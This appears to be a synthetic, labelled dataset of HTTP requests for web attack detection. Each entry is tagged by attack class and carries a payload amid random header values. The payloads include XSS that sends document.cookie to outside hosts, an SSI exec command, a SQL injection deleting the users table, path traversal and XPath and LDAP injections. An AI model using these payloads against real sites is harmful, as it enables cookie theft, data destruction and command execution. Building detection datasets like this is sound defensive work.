User-Agent: Mozilla/0.8 (compatible; MSIE 8.9; Win98; yo2nsgen; 1ishesp; 08ci)
UA-CPU: StrongARM
UA-Disp: 4437,742,16
UA-OS: Win9x
UA-Pixels: 6001x2247
Via: FTP/3.9 96.5.18.94, FTP/2.2 www.aeuowt.gif
Transfer-Encoding: compress
Upgrade: latA/6.2, lyernh/8.8, vU0s/9.0, esnis/7.5
Warning: 125 99.127.238.144 "ioisG0" "Sun, 22 Oct 06 11:55:13 CET"
X-Forwarded-For: 69.186.228.89
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48082
Start - Id: 49385
class: XPathInjection
GET /swDGXRHbvtW/onpeDgrlrmT/ahlsrv63bgssesaiaso.mspx?HXvPd4dACT=60376085&qOEjm=7499&hwloire=mnEdytmRisNrrsc&sxdedsnzpCtrsie=libtcmd&etine=ytri%2Fb1oWaC%2Fn1tdaE%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D678%5D+++%7C+++++a%2Ff%2FcKeai%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D69%5D++++or+++++%27gBm%27++++%3D++%27&mon9=dropaie%3Cdshutdownstcopy%3Biframefrom-4d&ohe=where&r4iemenEtlyaoi=h%3Dsbt&Iny7lAGe8eogDi=cconnect%25&hs=3 HTTP/1.0
Host: www.h7gsnt.st:80
Connection: close
Accept: audio/x-wav;q=0.3, text/xml;q=0.6
Accept-Charset: ks_c_5601-1987;q=0.0
Accept-Encoding: *
Accept-Language: *;q=0.0
Cache-Control: only-if-cached
Client-ip: 227.191.80.33
Cookie: hcPbqlYzntmp2a=altwal;indsxs=alsc
Cookie2: $Version="33"
Date: Wed, 17 Aug 05 15:15:39 CET
ETag: W/"BQ8qcs5LUF@poCI-A3p"
Expect: e9are=3ga6;rreedh=exVa6
From: pail@dkPluia.de
If-Modified-Since: Sat, 17 Feb 07 23:11:46 CET
If-Unmodified-Since: Tue, 14 Mar 06 14:43:31 GMT
If-Match: "tGGvWo9MuCa3BleVdy5"
If-None-Match: "aXnNKM7jKlphr15xo"
If-Range: *
Max-Forwards: 3128
MIME-Version: 7.0
Pragma: t=otihemeu
Proxy-Authorization: gWoe no1msa3=apmn
Authorization: Basic bXJpeGVjbzpvZHliM3M=
Range: 6-,-18019
Referer: /hriszonn.bin
TE: trailers
Trailer: Range
User-Agent: 5osld4ls5u/7.9.7
UA-CPU: StrongARM
UA-Disp: 129,1543,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0695x2392
Via: HTTP/8.6 117.203.12.121
Transfer-Encoding: deflate
Upgrade: titdOa/5.1
Warning: 873 179.220.247.176 "a53nepbizi" 
X-Forwarded-For: 100.79.4.137
X-Serial-Number: 24027765895
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49385
Start - Id: 48361
class: XPathInjection
GET /nluai/rGfa/xiEdslsitehi0a/3bs3Tw9/tvz7nngwegim/eNVoZ_6/sfnadely/g8r/rhejc3eo5e/nehqnppOM5-WgmFHxo/eY8pg/3tEes4he4thwwjenaeui.shtml?ebtmlgytue5ds=9h9PmDtgYMiv&Ra4itftsm5i2=grave&ant=m1phc7dMg&lrit5dtoro=4547748865&whereHEC=ctDionthharrshdhrt&heh4Smstyf0=g2RjMeJ3&rt5=9198&lnuwCenvnsjatb=h%24SqsEnhsna&e4ewe4o5cuqm7=eabeezjym7&d4=9799598&Nk3iGwvp=fxMNvbVknZ&Efahaxhdz5dherm=751360&Sz=858&0kssmrat=knlrno+a4eno8between0 HTTP/1.1
Host: 94.0.197.84:67
Connection: close
Accept: image/*;q=0.6, audio/*;q=0.7, image/*;q=0.8
Accept-Charset: iso-8859-4;q=0.9
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: eno=m5eeml
Client-ip: 135.61.177.8
Cookie: e7lbnuwsigla=oNws0;gOc=e9nnIq;p6lhqlmd6lichsr=e;gDntetnnnaieon=0468711008;ciatlxCTmoOei=pUsHaht1;astci=gu7vvKJ1h.q
Cookie2: $Version="99"
Date: Mon, 23 Jan 06 20:58:16 CET
ETag: "BHaSt0red.1BIjqc"
Expect: thOy7e=Ytrrd
From: bZh5tttn@Amirealh.de
If-Modified-Since: Tue, 29 Jun 04 04:26:19 GMT
If-Unmodified-Since: Fri, 01 Jul 05 19:46:13 GMT
If-Match: "VsccFMUpV8RCJ_v"
If-None-Match: *
If-Range: Sun, 12 Sep 04 10:02:34 UTC
Max-Forwards: 7037
MIME-Version: 4.9
Pragma: diotn='rrg'
Proxy-Authorization: nya1hs uees=eeteostl
Authorization: Basic aGVtZXJjOmU0bHk=
Range: 42-898,3033-93205
Referer: /Ya9tsmT/s8hAgP/wiaoa.ace
TE: trailers
Trailer: Accept
User-Agent: rattk'   or     (i   <     count(se/child::text())    and     j <  count(1yt/child::comment())   and   k  <  count(boftsk/child::*)  ) or   'tntdict'   = '   et' or
UA-Disp: 761,406,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 968x897
Via: 7.0 187.8.107.149, 7.4 126.106.194.76, FTP/0.4 www.nacq.gif
Transfer-Encoding: compress
Upgrade: s4jf/0.3, eel/4.5, A5ooh7/7.4, Hnyzt/6.0
Warning: 837 147.54.34.5 "IinnttmopneddCTh1s2r" "Tue, 02 Mar 10 09:48:09 CET"
X-Forwarded-For: 152.22.134.108
X-Serial-Number: 2527900
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48361
Start - Id: 47380
class: XSS
GET /ddEn/Tx7IUn2Uh4pg@wherel/aF4/D6ZJc1/c5xq8JCNr1/nhI9eoJ8hlaheb2t/tYvFfYXG0TKli.js?Ceehz0tea=nrmlah&8nawvduxmf=Blsde+sei&fdun75eiqd=1ddropbrlaTsm1sqne+E+&tBHmnRitantE26=%26%7B%5Bwindow.open%28%27http%3A%2F%2F89.98.73.221%2Fllolve.dll%27%2Bdocument.cookie%29%3B%5D%7D%3B&ritsr=dsemlioVthsg HTTP/1.0
Host: www.2dgs7ae.com
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: t=a
Client-ip: 246.85.69.97
Cookie: tr2eixtciyd=626116851;z74fnatusaAucA8=hsssystemstdinst7n4i9wp-isPdocument&nwindow.open;yn=t ?;zatehntri=7jtou8oaeUofa5
Cookie2: $Version="6"
Date: Sun, 23 Aug 09 06:36:36 CET
ETag: W/"eK9JG65XxM2Bk-Ko"
Expect: 7xxmj=O1mtSo
From: iArw@m7oEd0Y8.fr
If-Modified-Since: Sat, 22 May 04 13:12:25 UTC
If-Unmodified-Since: Fri, 23 Jan 09 06:33:49 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 98
MIME-Version: 2.6
Pragma: mdakaru='ieeebrt'
Proxy-Authorization: NTLM M3NhVDJodHVuaWRyajZpZTBpZGlPbnRPcnB0ZWlyOXN5Y3Jsb2VpbWNlY2Y1b2c=
Authorization: i3oce fsle=teaqnic
Range: 35419-,75138-2674,165640-
Referer: /ectsh0n/ioxIe/rlauko/nEcatle.pl
TE: trailers,deflate;q=0.9
Trailer: Expect
User-Agent: Mozilla/6.0 (Machintosh; U; PPC Mac OS X 1.3; st-ep; rv:5.7.6) Gecko/64936020
UA-CPU: MIPS
UA-Disp: 0297,0237,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 605x5902
Via: 9.4 134.100.224.172:21, 3.5 www.58oM.css, 8.6 www.emwieaLS.shtml
Transfer-Encoding: gzip
Upgrade: vihit/6.1, e9om/9.5, eo8qd/9.3
Warning: 045 www.7ot6v.tiff:40 "9ew6nQffbtqNaolon" 
X-Forwarded-For: 131.225.250.219
X-Serial-Number: 167101888
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47380
Start - Id: 40157
class: SSI
GET /w1kzV/oXSM/AdpassthruYXv4rcpoq3/logconnectoIaSmI/4eRpBm8MBXD3/pr/hsNUJ/da/ieosisNdSAgi3dt/iPRuzyyV@HsgTV.pl?ulnpee=a&et=inprn2txswe&hpe9wtx=%3C%21--+++++%23exec+++cmd%3D%22%2Fbin%2Fls++-l++%2Fhome%2Fsjlpamnod%2FstwrD%22++--%3E&87rinthpeebafa=sdivT3ezixtermvbscriptjofnhoj&emsSoElxY=98963081&eoe=5877592912&zssahaelcta=75 HTTP/1.0
Host: 151.51.31.72
Connection: eir6
Accept: audio/*;q=0.9
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: wWT-gi1eHel3, btu-seiqIar, se3o-eR2co2, tehe-erog
Cache-Control: only-if-cached
Client-ip: 163.65.44.55
Cookie: mznOmtiec2e=oqiuj d sfshutdown]ni;cm9oI=fg4nDtnah0e
Cookie2: $Version="8"
Date: Sun, 31 Aug 08 10:25:56 CET
ETag: W/"fwPq9i.9FDenawS"
Expect: ljsnetti=cinenyns
From: stce@ygsk.st
If-Modified-Since: Tue, 09 Aug 05 07:14:41 GMT
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Jul 08 09:39:19 GMT
Max-Forwards: 4
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: Basic a2RsdHRhbzpsb3RkZQ==
Range: 728-,7-688430
Referer: /nmia/u1ioltry/c1h3tl3/ecesIU.asp
TE: trailers
Trailer: Warning
User-Agent: Emwwd (eVIKgAbz)
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: FTP/5.8 www.42Nn.gif:32
Transfer-Encoding: compress
Upgrade: lindtc/2.8, 2eli/0.2, l1flm/2.2
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40157
Start - Id: 45863
class: PathTransversal
GET /ou-J.bin?ttMamoreene=..%2F..%2F..%2FWINNT%2Fautoexec.bat HTTP/1.1
Host: www.vUwere.uk:80
Connection: 6iIvxgd
Accept: image/jpeg;q=0.7, video/mpeg, audio/basic
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: ms-hrKeeiel;q=0.0, hh-ineLyLmr;q=0.3
Cache-Control: max-stale=07
Client-ip: 201.51.1.17
Cookie: cByY=9;etpFenqaPadn=Ke2tlDHi;lhog=3509968;ane6yua=t08wQ
Cookie2: $Version="9"
Date: Fri, 09 Nov 07 17:26:54 UTC
ETag: "NZR.pyFHpDj5.Hgrtt6w"
Expect: hor0
From: lnkmyen@hfeiUitnt.com
If-Modified-Since: Mon, 20 Oct 08 10:31:35 CET
If-Unmodified-Since: Sun, 19 Jul 09 21:20:33 CET
If-Match: *
If-None-Match: "r2XVw33r8ggBUxgz"
If-Range: Wed, 12 Apr 06 14:46:34 CET
Max-Forwards: 3
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: ha2n eocndmf=oIeb
Authorization: Digest uri=/doti8/eosjyiik.exe
Range: 81947-,357703-
Referer: http://www.eeoc4.st/sdoe/Fxd8h40d/Yu3nege/urcall.pl
TE: chunked,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/8.3 (Windows; U; Win98 5.1; ob-wa; rv:9.7.0) Gecko/63728911
UA-CPU: Sparc
UA-Disp: 096,9977,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 0549x672
Via: 3.3 63.142.53.49, 8.7 www.eeai.jpg
Transfer-Encoding: deflate
Upgrade: eAm77t/3.2, rcioQv/9.7, fitc/1.5
Warning: 078 www.eFerJs.html:545 "nhptoteG" 
X-Forwarded-For: 159.83.172.168
X-Serial-Number: 61308570883843
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45863
Start - Id: 47420
class: XSS
GET /oWeKk2yJO/tsA/OpsDcS0ABt/LrZJautoexecGi4/ikboRepll0it/ufP.DqjmAd1z.x@R/HeblwwtcSrolm4ntht/-lsHL1UklikeKHcU.dll?liZqhR=o%5Cn8a&i9nesQqPeTtatxo=%3Cimg+++dynsrc%3D++++%22+javascript%3A++++%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.st.com%2Fcgi-bin%2Fieindell.cgi%27%2Bdocument.cookie%29%3B%5D+++%22+%3E HTTP/1.1
Host: 243.212.241.126
Connection: keep-alive
Accept: video/mpeg
Accept-Charset: us-ascii, shift_jis, x-mac-ce;q=0.6, cp-932;q=0.7, windows-1250
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: 4gt=heHoa
Client-ip: 241.95.180.155
Cookie: T9-rT2DLFam=048032;6anNcclm3fS=i-_sogPv.I;6awWM@AsystemHA=0796136852
Cookie2: $Version="6"
Date: Thu, 15 Dec 05 05:00:18 GMT
ETag: W/"C1k1Lqle4.Nm.dMpRuG"
Expect: bnh5u=ermwt
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Tue, 14 Aug 07 22:34:29 CET
If-Unmodified-Since: Mon, 28 Sep 09 17:15:29 CET
If-Match: *
If-None-Match: "RoXA8h4qhRsrDZAS4"
If-Range: *
Max-Forwards: 60
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: reu2r otrtsOe=aiyqaet
Authorization: N6oit uObqrnme=FqcRs
Range: 25658-9605
Referer: /8eloesna/haih.jpeg
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/5.5 (Machintosh; U; Mac OS X 1.0; ec-et; rv:6.0.2) Gecko/53444195
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: FTP/3.9 www.ct8hao.js
Transfer-Encoding: identity
Upgrade: s8ps/3.5, oy10/6.8
Warning: 167 www.osue.shtml "oGfiwotdrontvzljesfb" "Thu, 13 Aug 09 09:38:42 UTC"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47420
Start - Id: 42736
class: SqlInjection
PUT /5Dn-/-zDD2CZin/ntmeopntllsdUiacis/rsctrl/omeH2ppea3nsptt4/l.y_93g/tsedek/hNPdwV0J@Zr/aa5Et5os1sle/quDumiLJKrf_-yMQLf8k/Oimh/Dge78aHESR.shtml? HTTP/1.1
Content-Length: 198
Content-Language: s,eePl
Content-Encoding: identity
Content-Location: http://www.seejohhb.ch/htdaankl/yl6ecxIL/4ngnseT/iavsmS4g.exe
Content-MD5: R2NzaWN1RnRuZWF0dHF0aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 13 Jun 07 15:05:43 GMT
Last-Modified: Mon, 30 Oct 06 19:59:16 GMT
Host: www.Uesfpe.st
Connection: untepeh
Accept: video/*, image/*;q=0.5
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 57.72.9.173
Cookie: ohtagH1i=7545956;dteSmDey7=3lshutdowndivh;7cthoYuIeehey=tnshrrJ'   );DELETEFROMusersWHEREupper(username)   =  upper(  'admin
Cookie2: $Version="467"
Date: Sat, 19 May 07 17:39:33 UTC
ETag: W/"D6SYDo5YCkMgqXZPzEv"
Expect: 100-continue
From: lnd9clwh@rteetb.st
If-Modified-Since: Sat, 29 Sep 07 22:31:10 UTC
If-Unmodified-Since: Tue, 25 Apr 06 05:01:25 GMT
If-Match: *
If-None-Match: "AjxqTKj8fiWmMs5C9Hf"
If-Range: *
Max-Forwards: 8794
MIME-Version: 0.6
Authorization: NTLM ZHZyZG5vY1R0dGFuYWVtaWdRZW1lenpkb3d0cGduT2ZyNg==
Referer: http://www.cf9s.com/Rimesej/3Oyv.avi
TE: trailers
Trailer: Range
User-Agent: Mozilla/0.5 (Machintosh; U; PPC Mac OS X 6.9; ag-ne; rv:7.3.4) Gecko/26671390
UA-CPU: MIPS
UA-Disp: 257,411,8
UA-Color: color8
Via: HTTP/4.5 83.84.111.27, dlRe/3.0 124.148.188.163
Transfer-Encoding: 6muu; vvnan1lt=edys
Upgrade: wio/7.9, nnng/7.1, s21rm/9.9, ondtA/4.0
Warning: 217 205.143.169.131:4848 "rcewtIuproezsetnh" "Fri, 20 Mar 09 22:34:04 UTC"
~~~~~: ~~~~~~~~~~~

fcA81Rlinheh=2&ebNTQletnaacvdt=4oaa&ygOl5ed=92017&losoeLTLlJbnv=9nesoyes&ri5ex8=open iexeci3e$$&ghr6ht1sz=U1ttcd0aryis&JIadminOQhzE=42822&Ona27Ej=euN o&ettrnznio=8005989&da=<as&2izoceihe=edezi

End - Id: 42736
Start - Id: 40779
class: SSI
POST /4GuwUsSkLB5a5aV1a/5rhnlihxopaaneseFR9/aetjahsuexheeexdi/geuCvTuQfkg/nhn/ooq/dneg5engiopui77omnsi/pEii1Keoe3hdnsnfhew/eqavtxy2nd/o.VPF2PQEJW/nJriodn.swf? HTTP/1.0
Content-Length: 176
Content-Language: ntistqeq,anetdnc
Content-Encoding: identity
Content-Location: http://tihSi.st/Xcsa/eec8/esdaaae/Otoc.bin
Content-MD5: dm5uaWVtb2Rlc3RzdXRSNg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 22 Oct 04 10:51:25 CET
Last-Modified: Sun, 17 Apr 05 14:30:09 CET
Host: 234.96.141.230
Connection: keep-alive
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: deflate;q=0.1, deflate
Accept-Language: sg-DcE0A;q=0.2, w-A, 3kie-Ysmt;q=0.4, aerar-tioSni, lSscYsg-ho
Cache-Control: only-if-cached
Cookie: 4eiitt4=801;Elkforma=66586033;aey8ir1aeubl8i=009627816;mu=58782;e0tdn=wp-oza|teyos Ep 0l
Cookie2: $Version="8"
Date: Tue, 06 Nov 07 06:18:33 GMT
ETag: "rEoemZBn5XOg5oITDDbP"
Expect: teeyi=yixae
From: cLaa@tnaEOe.cz
If-Modified-Since: Tue, 27 Sep 05 08:59:44 CET
If-Unmodified-Since: Fri, 07 Nov 08 10:50:07 UTC
If-Match: "0t._Yd52pV2m98Eq"
If-None-Match: *
If-Range: *
Max-Forwards: 0848
MIME-Version: 5.9
Pragma: si=Twes
Proxy-Authorization: Digest opaque="lnld"
Authorization: otCoo Exln=ec2s4w
Range: 35-,-4
Referer: /dtoe.sh
TE: chunked,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/6.1 (X11; U; Unix 8.7; s8-et; rv:3.5.1) Gecko/91903562
UA-Disp: 799,438,16
Via: FTP/1.0 137.255.192.252, 5.1 www.gy1nn9tb.shtml
Transfer-Encoding: irrd; eoea2lsa=fasxIDsM
Warning: 370 www.fpazeosi.tiff "AewOdth" 
X-Serial-Number: 29371695931968752
----: ------------------------------------

smnnnsiestE=aEootl&Tehtyen0hrugs=iai&ahe6dtostws=aohdc&CiSogdpey=<!--    #odbc  connect="fnam,gmv8nt,oss"     statement="select     *     from     3"-->

End - Id: 40779
Start - Id: 37999
class: LdapInjection
GET /bgsoundX/rQi0qhImf2-sc/eZV/C6EY/rEov3nyngnnto/wsaasijPIte1/tby1Yl2i/eSFufRr/nBoZ3xpFKqL5PtcWH.htm?tzo=tm&bgsounday_1pT1Q=25-2JITbT1M_&eeas=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29&ne6ij0diesolv=20&wnfadecokstnnis=+t+0tmputleh+o%25b&smJ=processing-instructiontkhi7hoopt&axr=tyosdalonq&433GAL2etcVopenX=iderd%29&ssi=OtdTo%3E&sAqbetween=7879&ms=aU&orzpnienyuooet=ekN%40yuCDX&tpotUeeyexfthi=e&UPYDwzE=2 HTTP/1.0
Host: www.osar7s.com
Connection: e0eho
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: loyl-nOoe9, yavtsroe-er8r;q=0.1, k-uaotStr;q=0.0, 6-hyeb;q=0.6
Cache-Control: ixa8a=wCns0lqg
Client-ip: 161.244.203.157
Cookie: 8uorvoda08toasj=i
Cookie2: $Version="4"
Date: Wed, 10 May 06 17:59:10 UTC
ETag: W/"UDst@tJde@GHR5NuG09g"
Expect: 100-continue
From: inr9@eduqt.it
If-Modified-Since: Wed, 11 Aug 04 15:04:12 UTC
If-Unmodified-Since: Mon, 02 Nov 09 22:44:33 GMT
If-Match: "aARiMKvENYDY14hBU"
If-None-Match: *
If-Range: "zGudF2_flf6avmA9H"
Max-Forwards: 1127
MIME-Version: 4.1
Pragma: onei='etmipext'
Proxy-Authorization: Digest opaque="tnharvec"
Authorization: tcxniu pbhHs=eaSs
Range: -90
Referer: /kiotm.gz
TE: trailers,chunked
Trailer: Connection
User-Agent: Mozilla/7.8 (X11; U; Solaris 9.5; ts-pa; rv:8.3.6) Gecko/58358776
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 880x8476
Via: FTP/4.9 www.lonon.js, 6.8 www.nut8HaA.htm, 0.5 156.118.49.7
Transfer-Encoding: identity
Upgrade: retod/3.9, tel/3.9, std/6.9, btts/4.3
Warning: 489 www.2ueh.shtml "ll6uon" "Mon, 01 Aug 05 13:30:03 CET"
X-Forwarded-For: 69.225.134.146
X-Serial-Number: 800649
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37999
Start - Id: 35606
class: XPathInjection
GET /0t9oazEerdtRi/wxok_TyD-ux/kb3cbeooiar4c9.js?txeC=%28i++++%3C++++count%28akase%2Fchild%3A%3Atext%28%29%29+and++j+++%3C+++count%28m3f%2Fchild%3A%3Acomment%28%29%29+++++and+k+++++%3C++count%28nGeai%2Fchild%3A%3A*%29+++++%29 HTTP/1.1
Host: 103.102.83.97:6851
Connection: hPzeeejI
Accept: application/*;q=0.5
Accept-Charset: euc-kr;q=0.3
Accept-Encoding: identity;q=0.9, compress;q=0.9, compress, deflate
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 71.205.202.98
Cookie: jin5TCJIN5pp=zph;zUar6vco=4nE;d7bscadajeesp=llthIoe;F144X=y5stdinca~ecd;n@bKTW=n4x
Cookie2: $Version="6"
Date: Wed, 12 Nov 08 05:40:13 CET
ETag: W/"tF5Sw0AaliY@Erh7FZ"
Expect: 100-continue
From: hsgss@kOcgeesht.ch
If-Modified-Since: Mon, 17 Aug 09 12:14:58 UTC
If-Unmodified-Since: Thu, 08 Feb 07 11:24:22 GMT
If-Match: *
If-None-Match: *
If-Range: "X@7uJwphzcqAWxX"
Max-Forwards: 5357
MIME-Version: 4.8
Pragma: o=nq1rfn
Proxy-Authorization: eNmRc aseer=gr3Gfc90
Authorization: NTLM RWdkcFNhNmFzZHJtQW1reGFPUmx0aHcxbG9odHR4bmlzZ29ldnl0dW9v
Range: 1278-6
Referer: /m2eealo.jpeg
TE: trailers,deflate,chunked
Trailer: Host
User-Agent: tesqw5oahNtT
UA-CPU: x86
UA-Disp: 458,730,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 138x439
Via: 4.4 www.erlu.jpeg, 0.3 99.180.156.149
Transfer-Encoding: gzip
Upgrade: eto3T/9.1, 9rfo3l/2.2, nuUaek/3.0
Warning: 642 225.30.125.246 "ai7adc" 
X-Forwarded-For: 28.16.209.118
X-Serial-Number: 65275952070459353
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 35606
Start - Id: 46559
class: XSS
GET /<SCRIPT>alert(document>URL)</SCRIPT>/? HTTP/1.1
Host: www.woi0qtafa.com:80
Connection: keep-alive
Accept: image/gif;q=0.1, video/mpeg, text/plain
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: oe='h'
Client-ip: 242.255.226.68
Cookie: pam7GO=smhhderynb7n;@linknaZE7O_=iacdjrtoThsbsg;AsesoL=186443;n2atdhadaet=usef%bryNCe-;uahEa=36459005;caeeV6mna9lei=rzelego'7<z
Cookie2: $Version="190"
Date: Fri, 26 Jan 07 10:18:14 CET
ETag: "HJpPlI7f4Xw2nJvkB"
Expect: seturnT=oaeb;IrmjE
From: ns7rogjc@npah.it
If-Modified-Since: Sun, 06 May 07 11:16:13 UTC
If-Unmodified-Since: Fri, 02 Mar 07 02:03:49 GMT
If-Match: "k3JWTcMEDBVUR_1KV1"
If-None-Match: "pbwxNHHuagfK5n.X"
If-Range: "gcCSvcvR30CzifAZ"
Max-Forwards: 303
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Digest username="rgww0see"
Authorization: Basic bGEydG9TNHQ6c2VuaWls
Range: -675973,735393-84650,-104881
Referer: http://www.rkcPt.ch/aeypdS/qrtAa/oeercy.nsf
TE: deflate,deflate,gzip;q=0.9
Trailer: Pragma
User-Agent: Mozilla/6.6 (Windows; U; WinNT 6.1; w3-nb; rv:4.6.3) Gecko/19742342
UA-CPU: x86
UA-Disp: 884,253,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 139x000
Via: HTTP/4.5 62.178.108.127:187, dm7uta/6.7 www.egish.js
Transfer-Encoding: gzip
Upgrade: irra/6.5, aec/6.4, reai65/1.7, rTN/8.4, fctm/6.2
Warning: 953 162.158.190.142 "tshTYs" 
X-Forwarded-For: 45.4.150.153
X-Serial-Number: 794611052
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46559
Start - Id: 50079
class: XPathInjection
POST /hezeAWc3Nj0vABR0rCZa/WahnEehcyifIlittl.htm? HTTP/1.0
Content-Length: 85
Content-Language: 4e
Content-Encoding: compress
Content-Location: /pdxpnh.php3
Content-MD5: bHN1c2RzNU5qZnR0dGxsNg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 24 Apr 09 22:49:17 CET
Last-Modified: Sun, 18 Oct 09 24:22:06 CET
Host: www.tsnl0aiipi.uk:1548
Connection: keep-alive
Accept: application/*;q=0.7, image/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: u5nu60ee-9sso;q=0.4
Cache-Control: no-store
Client-ip: 176.167.93.178
Cookie: BzECL=aen4mti;ydhm= p;Vunionyhttps=rma)rlshaepopen38\aTH;Rubuyhwn=rFwhnn2k8r;e0h=Em'   or 6     <  count(path/child::*)  or     't07se8' =';146csoieaubusue=68606127
Cookie2: $Version="118"
Date: Sat, 22 Sep 07 24:36:05 GMT
ETag: "qcDsZ5ObKRHRsT-K"
Expect: wlrs
If-Modified-Since: Sat, 14 Jun 08 09:50:44 GMT
If-Unmodified-Since: Tue, 01 Sep 09 09:18:23 CET
If-Match: "YiBM9YILQFPmQv.rjI_H"
If-None-Match: "KoiJFs3C0Paf7V14"
If-Range: "8YDs@hhsf8vKibb"
Max-Forwards: 3
MIME-Version: 1.2
Pragma: uheipa='eihlwitx'
Authorization: Digest nc=9C5D9E78
Referer: http://www.nsqg.biz/ngesdts/hd4h/9ile.php4
TE: gzip;q=0.8,trailers,trailers
User-Agent: Mozilla/7.9 (compatible; 1uGlyexfug; Win 9x; eneagtR; eten)
UA-Color: color8
Via: FTP/2.1 www.ltnlte.gif
Transfer-Encoding: identity
Warning: 280 231.16.57.114 "heey2eoaoen" "Tue, 20 Oct 09 23:24:02 UTC"
X-Forwarded-For: 111.165.36.41
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

entkHehl=47989&P5rcA=Etp0a&lteoee=4815598&6DgZJmj=58116363&idcblferd0ch==includecat

End - Id: 50079
Start - Id: 49572
class: XPathInjection
GET /iur/en1sap/oC@-zLOKl2@-/iCq/mihghi9d8Ot95hpfno/lgbFF-Jt/tabarcqn/dpv5.png?dtI5feuinnd7d2x=apeaH0h&thddT7ar9oqRn=64+or++1%3C+++++tynigr%2F9d%2Fb8ee%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D65%5D+++or++767%3D%27%5D+%7C+%2F*+%7C+%2Ffoo%5Bbar%3D%27 HTTP/1.0
Host: www.pes3w.com
Connection: oradh
Accept: */*;q=0.9
Accept-Charset: windows-1254, x-mac-cyrillic;q=0.0, iso-8859-4, iso-8859-3, x-mac-japanese
Accept-Encoding: *
Accept-Language: cYjEau-neeGxf, q6k-tidcw, 3todg-dlbet6;q=0.4, oHEd0-ecas0h;q=0.7, ojtrbt-swe;q=0.4
Cache-Control: no-cache
Client-ip: 27.25.46.254
Cookie: htutqianda=248623;bhe=itrhettffhm
Cookie2: $Version="6"
Date: Mon, 30 May 05 09:55:27 CET
ETag: "BEeu9oNIpOCkdaWPzyls"
Expect: rrqenrnd
From: xAlQbr@oetAt.gov
If-Modified-Since: Wed, 09 Jul 08 08:23:29 GMT
If-Unmodified-Since: Fri, 27 Oct 06 07:16:09 UTC
If-Match: "_KOdB@GEib1EWLonLz"
If-None-Match: "fX7hxhiFrWQFTeJ58"
If-Range: "rLax4NiTrw90KGpRiJtR"
Max-Forwards: 2
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: eeftuo sfagt=srres
Authorization: lnoie ee7dtp6r=pgaoo
Range: -351866,-996363,00-
Referer: http://www.Fxlnn4h.gov/nEeol/a1tnd2s/sgmruk.php3
TE: chunked;q=0.7,gzip;q=0.4,trailers
Trailer: If-Unmodified-Since
User-Agent: NfLh (rbHnxNZ; h-JOpfZ; a0pht-4)
